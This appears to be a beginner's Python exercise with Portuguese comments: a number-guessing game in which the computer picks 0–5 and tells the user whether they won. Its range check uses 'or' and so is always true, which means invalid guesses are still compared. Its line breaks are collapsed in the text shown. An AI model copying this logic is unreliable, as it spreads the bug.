#Escreva um programa que faça o computador # "pensar" em um número inteiro entre 0 # e 5 e peça para o usuário tentar descobrir # qual foi o número escolhido pelo computador. # O programa deverá escrever na tela se o # usuário venceu ou perdeu. from random import randint from emoji import emojize from time import sleep #Otimização e interface print('=*'*20, 'JOGO DA ADIVINHAÇÃO', '=*'*20) usuário = str(input('Qual seu nome, pequeno gafanhoto?:')).upper().strip() #Randomizando valores no pc pc = randint(0, 5) #Erro do usuário sendo previsto escolha = int(input('Pensei em um número de 0 a 5, {}\nDuvido tu acertares!\nR='.format(usuário))) #Analisando print('ANALISANDO...') sleep(5) if escolha > 5: print('Número inválido. Tente Novamente!') #Caso seja tudo normal(0 a 5) if escolha <= 5 or escolha >= 0: print('A escolha do PC foi {}\nA sua escolha foi {}\n\n'.format(pc, escolha)) #Validando o VENCEDOR if pc == escolha: print('AH, NÃO!. VOCÊ VENCEU!!!!!') else: print('HAHAHA. VENCI DE VOCÊ!!!!!!!!!!!!!!!!!!!!!!!!!') print('FIM.')